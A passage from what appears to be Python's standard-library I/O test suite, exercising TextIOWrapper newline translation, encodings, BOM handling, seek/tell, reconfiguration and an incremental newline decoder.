[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig has not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
